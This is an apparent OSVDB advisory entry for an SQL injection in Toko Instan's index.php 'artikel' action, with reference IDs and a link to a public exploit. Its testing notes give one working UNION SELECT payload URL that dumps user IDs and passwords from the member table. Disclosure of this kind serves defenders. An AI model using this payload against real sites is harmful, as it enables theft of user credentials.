Toko Instan index.php artikel Action id Variable SQL Injection

2007-11-14T00:00:00
ID OSVDB:40116
Type osvdb
Reporter OSVDB
Modified 2007-11-14T00:00:00

Description

Manual Testing Notes

http://[target]/index.php?cm=artikel&cp=show&id=-1//union//select//null,null,null,null,null,userid,password,null,null//from/*/member/

References:

Vendor URL: http://www.tokohandal.com/?cp=toko_feature Related OSVDB ID: 40117 ISS X-Force ID: 38449 Generic Exploit URL: http://www.milw0rm.com/exploits/4623 FrSIRT Advisory: ADV-2007-3906 CVE-2007-6004 Bugtraq ID: 26433